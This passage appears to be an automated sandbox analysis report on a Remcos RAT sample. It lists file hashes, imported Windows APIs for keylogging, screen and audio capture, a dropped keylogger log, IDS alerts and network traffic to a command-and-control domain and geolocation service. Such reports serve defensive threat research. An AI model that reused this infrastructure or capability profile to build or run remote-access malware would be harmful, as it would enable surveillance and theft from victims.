                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      19:07:32API Interceptor7069287x Sleep call for process: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      186.169.34.19017321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                        178.237.33.501732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                        • geoplugin.net/json.gp
                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                        • geoplugin.net/json.gp
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • geoplugin.net/json.gp
                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • geoplugin.net/json.gp
                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • geoplugin.net/json.gp
                                        file.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        remcos2025rem.duckdns.org17321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 186.169.34.190
                                        geoplugin.net1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                        • 178.237.33.50
                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                        • 178.237.33.50
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        file.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        COLOMBIATELECOMUNICACIONESSAESPCO17321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 186.169.34.190
                                        mips.elfGet hashmaliciousMiraiBrowse
                                        • 179.48.76.62
                                        hmips.elfGet hashmaliciousMiraiBrowse
                                        • 152.204.102.83
                                        botx.x86.elfGet hashmaliciousMiraiBrowse
                                        • 190.65.133.108
                                        qkbfi86.elfGet hashmaliciousMiraiBrowse
                                        • 191.109.65.158
                                        meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                        • 186.168.73.118
                                        amen.mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 190.67.85.78
                                        botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 167.2.201.184
                                        botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 167.8.217.10
                                        17310720655e73e0949bf79720da6be3e741758a040fb1e79235dccb7226a52f8c2fa1d13c495.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 152.202.226.52
                                        ATOM86-ASATOM86NL1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                        • 178.237.33.50
                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                        • 178.237.33.50
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 178.237.33.50
                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        file.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):144
                                        Entropy (8bit):3.349210161123417
                                        Encrypted:false
                                        SSDEEP:3:rhlKlf4OlclNef1ClDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lfJlc2wl55YcIeeDAlOWAv
                                        MD5:F77DFD7E6BFF8009C0A971EBCD0E964B
                                        SHA1:229C9625E4D0E1F208D861D4A21098FC2C99ADBD
                                        SHA-256:F28810C683769855CA784B3705D6200842FE635869FE11CDDABC7245BAE5AB89
                                        SHA-512:54CF062E1A3186C14869718DC32C9559575D9D0CCBAD0E466CB918F1A44B2589B68F892367B1DB14653C8DEE2C87AF8CB192D818227F49BFD5E5ADB7EDCCCE9A
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                        Reputation:low
                                        Preview:....[.2.0.2.4./.1.1./.2.0. .1.9.:.0.7.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                        Process:C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.01442467270497
                                        Encrypted:false
                                        SSDEEP:12:tkluQ+nd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydVauKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:4A8FAD17775993221C3AD2D68BB4B306
                                        SHA1:DB42C3975A64E7B4CE2A93FF5AF91F2DF73C82BD
                                        SHA-256:893F1B254D4EC2484868976F1B62D5A064909EA08E46F95193DBE79DB435E604
                                        SHA-512:63252CFDC2CC7A32F86D9CB5D27E1695A8C138EBFBF476741C017EB349F20BDC72FF5856E0044DB189BAABDB1C3819C29FFC33A054810BD0354726300063D52C
                                        Malicious:false
                                        Reputation:low
                                        Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.6004596667154685
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File size:494'592 bytes
                                        MD5:3cc6b6ef2d90a55b3a9cb4b2f9c1526c
                                        SHA1:fbc78cbbc06ab9f435fd3ec2fc46cf3a8c433dcf
                                        SHA256:eafb4332827f8e2eccc30716537cfb9fdc3112b369d519b1fdfd9c5b39b8f1ce
                                        SHA512:f1143c6c4253b3c353cf5331f958c9f9b2a301097ccf8fd683a003ddc1258d91b44284202d2e72e46b817f544811ec7c9a883032f7a9f1e4fa5a370a2f1e794b
                                        SSDEEP:6144:u5zY+w1LqZBCxKedv//NEUn+N5hkf/0TE7RvIZ/jbsAORZzAXMcrJA4:u5k+Yqaxrh3Nln+N52fIA4jbsvZziA4
                                        TLSH:0EB4AE01BAD2C072D57514300D3AF776EAB8BD201836497B73DA1D5BFE31190A72AAB7
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..
                                        Icon Hash:95694d05214c1b33
                                        Entrypoint:0x434a80
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6710C0B1 [Thu Oct 17 07:45:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:1389569a3a39186f3eb453b501cfe688
                                        Instruction
                                        call 00007F2F4CB4E05Bh
                                        jmp 00007F2F4CB4DAA3h
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 00000324h
                                        push ebx
                                        push esi
                                        push 00000017h
                                        call 00007F2F4CB702F3h
                                        test eax, eax
                                        je 00007F2F4CB4DC17h
                                        mov ecx, dword ptr [ebp+08h]
                                        int 29h
                                        xor esi, esi
                                        lea eax, dword ptr [ebp-00000324h]
                                        push 000002CCh
                                        push esi
                                        push eax
                                        mov dword ptr [00471D14h], esi
                                        call 00007F2F4CB50066h
                                        add esp, 0Ch
                                        mov dword ptr [ebp-00000274h], eax
                                        mov dword ptr [ebp-00000278h], ecx
                                        mov dword ptr [ebp-0000027Ch], edx
                                        mov dword ptr [ebp-00000280h], ebx
                                        mov dword ptr [ebp-00000284h], esi
                                        mov dword ptr [ebp-00000288h], edi
                                        mov word ptr [ebp-0000025Ch], ss
                                        mov word ptr [ebp-00000268h], cs
                                        mov word ptr [ebp-0000028Ch], ds
                                        mov word ptr [ebp-00000290h], es
                                        mov word ptr [ebp-00000294h], fs
                                        mov word ptr [ebp-00000298h], gs
                                        pushfd
                                        pop dword ptr [ebp-00000264h]
                                        mov eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-0000026Ch], eax
                                        lea eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-00000260h], eax
                                        mov dword ptr [ebp-00000324h], 00010001h
                                        mov eax, dword ptr [eax-04h]
                                        push 00000050h
                                        mov dword ptr [ebp-00000270h], eax
                                        lea eax, dword ptr [ebp-58h]
                                        push esi
                                        push eax
                                        call 00007F2F4CB4FFDDh
                                        Programming Language:
                                        • [C++] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6eeb80x104.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4ae4.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bc8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3500x38.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x6d3e40x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3880x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x590000x500.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x571f50x5720042490688bcf3aaa371282a7454b99e23False0.5716155173959828data6.625772280516175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x590000x179dc0x17a008c19f58f5a4e5f2d5359d54234473252False0.5008370535714286data5.862025333737917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x710000x5d540xe000eaccffe1cb836994ce5d3ccfb22d4f9False0.22126116071428573data3.0035180736120775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .gfids0x780000x2300x4009ca325bce9f8c0342c0381814603584aFalse0.330078125data2.3999762503719224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x790000x4ae40x4c0009724eb8731eaf186abd444537b3cccaFalse0.2783203125data3.979487702487559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x7e0000x3bc80x3c0071caad037f5f2070293ebf9ebb49e4e2False0.764453125data6.724383647387111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                        RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                        RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                        RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                        RT_RCDATA0x7d5cc0x4d8data1.0088709677419354
                                        RT_GROUP_ICON0x7daa40x3edataEnglishUnited States0.8064516129032258
                                        DLLImport
                                        KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                                        USER32.dllGetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
                                        GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                                        ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                                        SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                        ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                                        SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                                        WINMM.dllwaveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
                                        WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                        urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                        gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                        WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-21T01:07:03.504324+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549704186.169.34.1901213TCP
                                        2024-11-21T01:07:06.213772+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549705178.237.33.5080TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 01:07:02.031492949 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:02.151106119 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:02.151180029 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:02.157321930 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:02.276940107 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:03.453918934 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:03.504323959 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:03.698690891 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:03.713691950 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:03.833290100 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:03.833363056 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:03.952951908 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:04.256251097 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:04.258373976 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:04.378262997 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:04.457170963 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:04.504343033 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:04.755872965 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:07:04.875504017 CET8049705178.237.33.50192.168.2.5
                                        Nov 21, 2024 01:07:04.875647068 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:07:04.875797033 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:07:04.995251894 CET8049705178.237.33.50192.168.2.5
                                        Nov 21, 2024 01:07:06.213676929 CET8049705178.237.33.50192.168.2.5
                                        Nov 21, 2024 01:07:06.213772058 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:07:06.240336895 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:06.361443043 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:07.213330030 CET8049705178.237.33.50192.168.2.5
                                        Nov 21, 2024 01:07:07.213421106 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:07:27.596441984 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:27.598490953 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:27.718019009 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:57.608752966 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:07:57.612258911 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:07:57.732027054 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:27.618530035 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:27.628767967 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:08:27.748388052 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:54.520206928 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:54.832516909 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:55.629388094 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:56.832525015 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:57.627985001 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:57.631968021 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:08:57.751578093 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:59.332520008 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:04.223134995 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:13.899424076 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:27.643048048 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:27.644671917 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:09:27.764343023 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:57.653112888 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:57.654825926 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:09:57.774395943 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:27.675725937 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:27.677356005 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:10:27.797154903 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:57.686211109 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:57.689920902 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:10:57.809727907 CET121349704186.169.34.190192.168.2.5
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 01:07:01.691200972 CET5045553192.168.2.51.1.1.1
                                        Nov 21, 2024 01:07:02.028549910 CET53504551.1.1.1192.168.2.5
                                        Nov 21, 2024 01:07:04.523593903 CET4937453192.168.2.51.1.1.1
                                        Nov 21, 2024 01:07:04.752619982 CET53493741.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 21, 2024 01:07:01.691200972 CET192.168.2.51.1.1.10x4c9cStandard query (0)remcos2025rem.duckdns.orgA (IP address)IN (0x0001)false
                                        Nov 21, 2024 01:07:04.523593903 CET192.168.2.51.1.1.10x2164Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 21, 2024 01:07:02.028549910 CET1.1.1.1192.168.2.50x4c9cNo error (0)remcos2025rem.duckdns.org186.169.34.190A (IP address)IN (0x0001)false
                                        Nov 21, 2024 01:07:04.752619982 CET1.1.1.1192.168.2.50x2164No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                        • geoplugin.net
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549705178.237.33.50805000C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 01:07:04.875797033 CET71OUTGET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
